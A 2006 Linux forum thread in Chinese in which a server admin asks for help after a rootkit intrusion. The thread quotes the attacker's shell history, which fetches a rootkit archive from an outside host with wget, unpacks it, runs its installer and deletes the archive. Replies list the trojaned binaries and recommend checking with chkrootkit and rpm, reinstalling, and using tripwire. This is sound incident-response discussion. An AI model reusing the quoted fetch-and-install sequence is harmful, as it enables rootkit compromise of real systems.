LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
查看: 1465|回复: 13

求救:系统给黑客用rk.tgz攻击

[复制链接]
发表于 2006-2-6 09:57:56 | 显示全部楼层 |阅读模式
现在很多程序都无法正常使用,历史记录有以下命令
cat /etc/issue
cd /var/tmp
ls -a
wget www.mafiasef.go.ro/rknutza.tgz
ftp
tar xvfz rk.tgz
rm -rf rk.tgz
cd budu
pico hh
nano hh
vi hh
./install
大伙帮我分析解决一下啊!……
发表于 2006-2-6 10:32:36 | 显示全部楼层
把 hh 看看都改成什么了。然后把端口封锁。

当然,把所有的里边提到的文件都替换回来。这里肯定都是木马。
文件列表:
ava
ava1
chattr.tgz
crontabs
h
hh
hhh
informatii
install
kde.c
ls
mail
netstat
pico.tgz
ps
sense
sl2
swapd2
sysinfo
top
wget.tgz


最好赶快重装系统,或者至少重新把包都更新一次。
回复 支持 反对

使用道具 举报

发表于 2006-2-6 10:35:36 | 显示全部楼层
尽量别再用root登录,因为密码会被记录的了。
用livecd启动吧。
回复 支持 反对

使用道具 举报

发表于 2006-2-7 10:17:03 | 显示全部楼层
有rk.tgz包么???
回复 支持 反对

使用道具 举报

发表于 2006-2-7 12:59:47 | 显示全部楼层
仔细看帖子,history里边不就有嘛。
回复 支持 反对

使用道具 举报

发表于 2006-2-7 14:30:17 | 显示全部楼层
把包发上来大家烟酒烟酒
回复 支持 反对

使用道具 举报

发表于 2006-2-7 14:58:17 | 显示全部楼层
1. 是否是redhat系统?如果是rpm -qaV 看看什么东西被改过了!
2. 下一个chkrootkit ( http://www.chkrootkit.org ) ,自查一下.用相应干净的程序替代!
3. 最好且最简单的办法就是备出重要数据,重装后使用tripwire且定期做监测.
回复 支持 反对

使用道具 举报

发表于 2006-2-7 15:24:50 | 显示全部楼层
Post by Yuri
把包发上来大家烟酒烟酒


是不是该打一下?。看看我上边的帖子。。。

(最近烟酒过多了?嘿嘿)
回复 支持 反对

使用道具 举报

 楼主| 发表于 2006-2-8 08:33:46 | 显示全部楼层
没有包了,已经给入侵者删除掉了!
遇到这样的攻击已经好几次了……
一直都没有办法解决,只能重装,
损失惨重啊……
回复 支持 反对

使用道具 举报

 楼主| 发表于 2006-2-8 08:38:47 | 显示全部楼层
我的服务器全部是RedHat9.0的!
最小化安装,lilo启动方式,除了SSH
,Http端口,其他服务都停止了……
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表